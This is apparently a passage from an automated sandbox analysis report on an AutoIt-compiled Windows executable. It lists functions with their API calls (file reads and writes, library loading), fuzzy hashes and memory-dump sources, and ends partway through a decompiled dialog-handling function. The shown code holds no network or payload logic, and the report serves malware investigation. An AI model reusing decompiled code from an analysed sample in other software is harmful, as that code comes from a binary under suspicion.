Opcode Fuzzy Hash: 32ada5bc823086429e024f9d55c05650edb4d1e79ac84a4937d9e180fd9cd3b6
Instruction Fuzzy Hash: D7016D71205204BFEB156A25DC8AFBB3F6DEFC9760F10802AF906DE2D1DA61D840D670

Uniqueness

Uniqueness Score: -1.00%

Function 00DBF290, Relevance: 1.7, APIs: 1, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca0c0e689db99cbe6ee0a172b3501af4a1f302268f7eb525a978d0d59f5c7684
Instruction ID: 0281093d1c271ac930b61dfe9f2058814614bb30d7b4c1d6b0add44611b4ffe0
Opcode Fuzzy Hash: ca0c0e689db99cbe6ee0a172b3501af4a1f302268f7eb525a978d0d59f5c7684
Instruction Fuzzy Hash: 0D617674A0020ADFCB10DF64C881ABBB7F9EF45304F18846AEA469B291DB71ED51CB71

Uniqueness

Uniqueness Score: -1.00%

Function 00DB750F, Relevance: 1.6, APIs: 1, Instructions: 103COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00DB75EA

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: df3760c9a31d76dbe39e7bc79386ba85fab8a4de2ba33206d5b6dbeb6f12b7d3
Instruction ID: a24b52ca74d3e788b26246c0abf4bac12d50145774f12028bf95ed935afd12bd
Opcode Fuzzy Hash: df3760c9a31d76dbe39e7bc79386ba85fab8a4de2ba33206d5b6dbeb6f12b7d3
Instruction Fuzzy Hash: 06316F75608A02DFC724DF19C490AA5F7E0FF89310B14C56EE98A8B791D730E841CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00DB5AEE, Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00DB5B96

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: a0749f0fefd7c7ca8be13e975782664dc88c4028ef6f9da8c355e804ef5e5996
Instruction ID: c098877555638b22c9d429a23a0463fb2c7dbd8dedc49e743acf3b4a2f035427
Opcode Fuzzy Hash: a0749f0fefd7c7ca8be13e975782664dc88c4028ef6f9da8c355e804ef5e5996
Instruction Fuzzy Hash: 36313D31A00A05EFCB18DF6DD484BADB7B5FF48310F188619D81A97714D770A990CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00DB7B53, Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00DB7BB3

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: a5e93a1436a4aefc385863fd9f2fb3263b163e9ebbff05f1f823c733ed0e67d9
Instruction ID: 21b564c0298fe11fdfa49ba94c45190c75fbc3f5572c8c9f20a52acb54f50f5a
Opcode Fuzzy Hash: a5e93a1436a4aefc385863fd9f2fb3263b163e9ebbff05f1f823c733ed0e67d9
Instruction Fuzzy Hash: FC212472604A08EBDB149F27F8417AE7BF8FB54390F31846AE486D5190EB70D1D0DB65

Uniqueness

Uniqueness Score: -1.00%

Function 00DB4DDD, Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00DB4BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00DB4BEF

Part of subcall function 00DD525B: __wfsopen.LIBCMT ref: 00DD5266

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00E752F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00DB4E0F

Part of subcall function 00DB4B6A: FreeLibrary.KERNEL32(00000000), ref: 00DB4BA4

Part of subcall function 00DB4C70: _memmove.LIBCMT ref: 00DB4CBA

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: cee9e36e2057bb65843e35e4dbffd60164704021d3dfdd2bf93784ea02aae4d5
Instruction ID: 210b1c5e6bc9806dc9e08cc7dc9272fad1d28196ef81223e6419b0b4a9d8ce49
Opcode Fuzzy Hash: cee9e36e2057bb65843e35e4dbffd60164704021d3dfdd2bf93784ea02aae4d5
Instruction Fuzzy Hash: D9118F31600209EACB15EF61C856FEE77A9EF44B50F108829F642A7182DE71DA059B75

Uniqueness

Uniqueness Score: -1.00%

Function 00DBB7DD, Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00DF0C2A

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Window
String ID:
API String ID: 2353593579-0
Opcode ID: 609e9b2e4f64a87cda4753e2d77c1a85a4fccb2d13aaf45ed11188767bdc9a5f
Instruction ID: 46ef05e79c5d82c5b33f093bfcf483056f1f8fa3b7c726fd61ab5e5475a2291d
Opcode Fuzzy Hash: 609e9b2e4f64a87cda4753e2d77c1a85a4fccb2d13aaf45ed11188767bdc9a5f
Instruction Fuzzy Hash: 5E117C35200A46BEDB09AA34D884EF9FBACFF05394F54012AF85AD2111DB60AA65D7F0

Uniqueness

Uniqueness Score: -1.00%

Function 00DB5BC0, Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,00010000,?,00000000,00000000,?,00010000,?,00DB56A7,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00DB5C16

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: a9d84a3f66523f7b00ce351cc20535e7c7c28b1c373db6ebd03a90efbacf0ed2
Instruction ID: 40d013c8b74d1d4f444758b00e169d61bce9e4f68d364009392dfe01b4a83f91
Opcode Fuzzy Hash: a9d84a3f66523f7b00ce351cc20535e7c7c28b1c373db6ebd03a90efbacf0ed2
Instruction Fuzzy Hash: B4113A35600B04DFD3208F1AE880BA2BBF5EF44760F14C92DE9AB86A55D7B0E945CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00DB7DE1, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00DB7E22

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 2c09507b35649bba4926d917835406be63c5a4b928e5c6e4e3548e7a42b143c1
Instruction ID: d3564fbe06eb4e204982e18b05ff68240d7952ccebc052f65cf5739edd0f99a0
Opcode Fuzzy Hash: 2c09507b35649bba4926d917835406be63c5a4b928e5c6e4e3548e7a42b143c1
Instruction Fuzzy Hash: 6B01DB72204702AED3219F68C806FA77BA4DF84760F10852FF55BCA291DA71E44087B0

Uniqueness

Uniqueness Score: -1.00%

Function 00E0F73D, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

Part of subcall function 00DD0DB6: _malloc.LIBCMT ref: 00DD0DCE

_memmove.LIBCMT ref: 00E0F778

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _malloc_memmove
String ID:
API String ID: 1183979061-0
Opcode ID: 03ed6151d7788ec2372c79656bc86721a7c16d89d9074e06b8773f19732835ed
Instruction ID: caae53a01a2ef9c6d52e33b09663bbe19f4ea31e4f73eebcdac4e8fd1fd66ad2
Opcode Fuzzy Hash: 03ed6151d7788ec2372c79656bc86721a7c16d89d9074e06b8773f19732835ed
Instruction Fuzzy Hash: 2901D6322002256BCB24DF2DC88196BB7A9EFC5364714443FF90ACB345E631E90187A1

Uniqueness

Uniqueness Score: -1.00%

Function 00E176C4, Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

Part of subcall function 00DD0DB6: _malloc.LIBCMT ref: 00DD0DCE

Part of subcall function 00DD0DB6: std::exception::exception.LIBCMT ref: 00DD0DEC
Part of subcall function 00DD0DB6: __CxxThrowException@8.LIBCMT ref: 00DD0E01

_memset.LIBCMT ref: 00E176F9

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Exception@8Throw_malloc_memsetstd::exception::exception
String ID:
API String ID: 4117793777-0
Opcode ID: 51fd5647120d9ff7023d9e16625e6f35e7d278830e6ae24704dc486a72fb3205
Instruction ID: 1a47968657b12a81bb92ebe8627f4126157073f07281f444060220467da26f8b
Opcode Fuzzy Hash: 51fd5647120d9ff7023d9e16625e6f35e7d278830e6ae24704dc486a72fb3205
Instruction Fuzzy Hash: 4E01E4742042009FD721EF5CD841B81BBF2EF5A320F24845EE5888B392DB76A8408BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00DB8248, Relevance: 1.5, APIs: 1, Instructions: 38COMMON

Download Yara Rule

APIs

Part of subcall function 00DD0DB6: _malloc.LIBCMT ref: 00DD0DCE

CharUpperBuffW.USER32(00000000,?,00000000,00000048,-00000003,?,00DC3E69,?,?,?,-00000003,00000000,00000000), ref: 00DB8280

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: BuffCharUpper_malloc
String ID:
API String ID: 1573836695-0
Opcode ID: af43afb8c8099cd28c3b2960a4439fa1a833d5a7ec260689eac5d7d01b7c1f01
Instruction ID: 459d3878c33746f0c26c49552b9bed710b1e6988849b4b43c0983acf69a9abe4
Opcode Fuzzy Hash: af43afb8c8099cd28c3b2960a4439fa1a833d5a7ec260689eac5d7d01b7c1f01
Instruction Fuzzy Hash: 11F0F675604A21EBCB115B55D4006AEFB68FF84F60F00412AF54746650CF31D810DBF8

Uniqueness

Uniqueness Score: -1.00%

Function 00DB4E4A, Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,00E752F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00DB4E7E

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: a694eea7e4e74245bdb29b1cde22a65701539a883dfc26276e8e2de81537ce2d
Instruction ID: a35418429aa7cb62e7b6204eceaef52e287d9d7b9cff46fdf26309600957ce00
Opcode Fuzzy Hash: a694eea7e4e74245bdb29b1cde22a65701539a883dfc26276e8e2de81537ce2d
Instruction Fuzzy Hash: 3EF01571501711CFCB34DF64E494896BBE1BF143293248A3EF1D782622C772E844DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00DD0791, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32 ref: 00DD07B0

Part of subcall function 00DB7BCC: _memmove.LIBCMT ref: 00DB7C06

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: 31e569c86635d3e17931e55e3c91b1f87afb8736a30ee3a20bd1d42897093c3a
Instruction ID: d5d205bb119d5b329c909826acaeafef6b653c80468756036f4d7ee1345d5f9d
Opcode Fuzzy Hash: 31e569c86635d3e17931e55e3c91b1f87afb8736a30ee3a20bd1d42897093c3a
Instruction Fuzzy Hash: 24E08636A041285BC720A6699C05FEA779DDB886A0F0441B5FC08D7255D9609C808AA0

Uniqueness

Uniqueness Score: -1.00%

Function 00E1345A, Relevance: 1.5, APIs: 1, Instructions: 20fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00E13359: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000001,?,?,00E13466,?,?,?,00DEDC37,00E655C0,00000002,?,?), ref: 00E133D7

WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?,?,00DEDC37,00E655C0,00000002,?,?,?,?), ref: 00E13474

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: File$PointerWrite
String ID:
API String ID: 539440098-0
Opcode ID: f8e6106db2ffd32f8dc2e1e1d6def436e112a0a202931d5237d5e0fd2c5a9e84
Instruction ID: 2ef3d1f4179529dc7f49aff005bff98efa2165e7e6c68dd59e4b0bd0863aca3c
Opcode Fuzzy Hash: f8e6106db2ffd32f8dc2e1e1d6def436e112a0a202931d5237d5e0fd2c5a9e84
Instruction Fuzzy Hash: 41E04F36400208FBD7209F94D805FD9B7FCEB04310F00065AF94091111D7B29E149BD0

Uniqueness

Uniqueness Score: -1.00%

Function 00DB5C6F, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNEL32(?,?,?,00DB57C1,?,00DB6AD7), ref: 00DB5C8F

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 3c451235f9db227ac25e60eebffd0bce42077dbfca6dbd407766ed7c72fb5f69
Instruction ID: 212f4f19b46df74f15dd2a05c567366caba0a50d316505d14f8186a15949aa24
Opcode Fuzzy Hash: 3c451235f9db227ac25e60eebffd0bce42077dbfca6dbd407766ed7c72fb5f69
Instruction Fuzzy Hash: 75E0B675400B02DFC3314F1AE804462FBF5FFD13613244A2FD4E692A64D3B1588A8FA0

Uniqueness

Uniqueness Score: -1.00%

Function 00DB5C4E, Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,?,?,00DEDD42,?,?,00000000), ref: 00DB5C5F

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 19b1eec67a7f61517e69670b652d01e0552d98e99fa4eb2e43d1e8bc5b41a0dc
Instruction ID: 64647a2519f553d9e759ea8a87869a11bbc55671fab6ac98e50cc4792607eeb6
Opcode Fuzzy Hash: 19b1eec67a7f61517e69670b652d01e0552d98e99fa4eb2e43d1e8bc5b41a0dc
Instruction Fuzzy Hash: A4D0C77464020CBFE710DB81DC46FA97BBCD705710F100294FD0466290D6F27D548795

Uniqueness

Uniqueness Score: -1.00%

Function 00DD2C44, Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

Part of subcall function 00DD3217: __lock.LIBCMT ref: 00DD3219

__onexit_nolock.LIBCMT ref: 00DD2C60

Part of subcall function 00DD2C88: RtlDecodePointer.NTDLL(?,?,?,?,?,00DD2C65,?,00E69ED0,0000000C,00DD2D4B,?,?,00DB1014,00DEB559), ref: 00DD2C9B
Part of subcall function 00DD2C88: DecodePointer.KERNEL32(?,?,?,?,?,00DD2C65,?,00E69ED0,0000000C,00DD2D4B,?,?,00DB1014,00DEB559), ref: 00DD2CA6
Part of subcall function 00DD2C88: __realloc_crt.LIBCMT ref: 00DD2CE7
Part of subcall function 00DD2C88: __realloc_crt.LIBCMT ref: 00DD2CFB
Part of subcall function 00DD2C88: EncodePointer.KERNEL32(00000000,?,?,?,?,?,00DD2C65,?,00E69ED0,0000000C,00DD2D4B,?,?,00DB1014,00DEB559), ref: 00DD2D0D
Part of subcall function 00DD2C88: EncodePointer.KERNEL32(?,?,?,?,?,?,00DD2C65,?,00E69ED0,0000000C,00DD2D4B,?,?,00DB1014,00DEB559), ref: 00DD2D1B
Part of subcall function 00DD2C88: EncodePointer.KERNEL32(00000000,?,?,?,?,?,00DD2C65,?,00E69ED0,0000000C,00DD2D4B,?,?,00DB1014,00DEB559), ref: 00DD2D27

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Pointer$Encode$Decode__realloc_crt$__lock__onexit_nolock
String ID:
API String ID: 3536590627-0
Opcode ID: 46d8b745d41f95cbdce28d363bb2000cf661fbb937e2528b7668498d5d9f1d14
Instruction ID: 6203d63afde76ebed227398000c01bfe8e22fccb3dc7e1af911b98b586d2ec1f
Opcode Fuzzy Hash: 46d8b745d41f95cbdce28d363bb2000cf661fbb937e2528b7668498d5d9f1d14
Instruction Fuzzy Hash: E2D01271D50209AADB11BBA8890676CB6A4EF20732F508246F054662C2CB740B019FB6

Uniqueness

Uniqueness Score: -1.00%

Function 00DD525B, Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 00DD5266

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: bc82b5e96e1ddca5bf892a9d011cf5aab42204084587b92e064f205c2d189170
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: 1DB0927644020C77CE012A82FC02A493F199B41764F408021FB0C18262E673A6689AA9

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00E3CABC, Relevance: 75.9, APIs: 40, Strings: 3, Instructions: 632
windowkeyboardCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00E3CABC(void* __ebx, struct HWND__* _a4, int _a8, long _a12) {
				intOrPtr _v24;
				long _v52;
				void* _v56;
				intOrPtr _v60;
				intOrPtr _v84;
				long _v92;
				void* _v96;
				signed int _v108;
				int _v112;
				void* _v116;
				struct HWND__** _v120;
				intOrPtr _v124;
				long _v128;
				signed int _v132;
				int _v136;
				void* _v140;
				signed int _v144;
				struct HWND__* _v148;
				struct tagPOINT _v156;
				struct tagPOINT _v164;
				signed int _v165;
				signed int _v168;
				signed int _v172;
				long _v176;
				void* __edi;
				signed int _t218;
				long _t220;
				signed int _t221;
				long _t222;
				intOrPtr _t224;
				signed int _t226;
				signed int _t227;
				signed int _t230;
				intOrPtr _t231;
				signed int _t234;
				intOrPtr _t237;
				signed int _t240;
				intOrPtr _t242;
				intOrPtr _t249;
				intOrPtr _t252;
				signed int _t256;
				intOrPtr _t259;
				signed int _t269;
				intOrPtr _t271;
				intOrPtr _t273;
				long _t277;
				intOrPtr _t280;
				signed int _t286;
				signed int _t289;
				intOrPtr _t291;
				signed int _t293;
				signed int _t301;
				intOrPtr _t304;
				signed int _t308;
				long _t316;
				signed int _t339;
				intOrPtr _t340;
				intOrPtr _t345;
				intOrPtr _t350;
				signed int _t355;
				signed int _t357;
				short _t359;
				short _t360;
				short _t362;
				signed int _t364;
				struct HWND__* _t371;
				signed int _t372;
				long _t373;
				intOrPtr _t379;
				intOrPtr _t382;
				intOrPtr _t383;
				intOrPtr _t385;
				long _t388;
				struct HMENU__* _t390;
				signed int _t392;
				struct HMENU__* _t394;
				signed int _t396;
				intOrPtr _t400;
				signed int _t413;
				void* _t414;
				intOrPtr _t415;
				intOrPtr _t416;
				long _t418;
				intOrPtr _t421;
				signed int _t424;
				struct tagPOINT* _t434;
				intOrPtr _t435;
				int _t436;
				long _t438;
				signed int _t439;
				intOrPtr _t440;
				void* _t445;
				void* _t446;

				_t218 = E00DB2612(0xe757b0, _a4);
				_t379 =  *0xe75810; // 0x0
				_t418 = _a12;
				_v156.y = _t218;
				_t421 =  *((intOrPtr*)( *((intOrPtr*)(_t379 + _t218 * 4))));
				_t220 =  *(_t418 + 8);
				_v124 = _t421;
				_t445 = _t220 - 0xfffffe6e;
				if(_t445 > 0) {
					__eflags = _t220 - 0xfffffff0;
					if(__eflags > 0) {
						__eflags = _t220 - 0xfffffff4;
						if(_t220 == 0xfffffff4) {
							_t221 = E00DB25DB(0xe757b0,  *_t418);
							_v168 = _t221;
							__eflags = _t221 - 0xffffffff;
							if(_t221 == 0xffffffff) {
								L8:
								_t222 = DefDlgProcW(_a4, 0x4e, _a8, _t418);
								L9:
								return _t222;
							}
							_t382 =  *0xe75824; // 0x1569100
							_t383 =  *((intOrPtr*)( *((intOrPtr*)(_t382 + _t221 * 4))));
							_t224 =  *((intOrPtr*)(_t383 + 0x90));
							__eflags = _t224 - 0x10;
							if(_t224 == 0x10) {
								L100:
								_t226 =  *((intOrPtr*)(_t418 + 0xc)) - 1;
								__eflags = _t226;
								if(_t226 == 0) {
									_t222 = 0x20;
									goto L9;
								}
								_t227 = _t226 - 0x10000;
								__eflags = _t227;
								if(_t227 != 0) {
									goto L8;
								}
								__eflags =  *((intOrPtr*)(_t383 + 0x48)) - 0xfe000000;
								_v165 = _t227;
								if( *((intOrPtr*)(_t383 + 0x48)) == 0xfe000000) {
									_v165 = 1;
								}
								_t230 = E00DB2402(0xe757b0,  *((intOrPtr*)(_t418 + 0x2c)),  &_v148,  &_v164);
								__eflags = _t230;
								if(_t230 != 0) {
									_t231 =  *0xe75824; // 0x1569100
									_t424 = _v164.x;
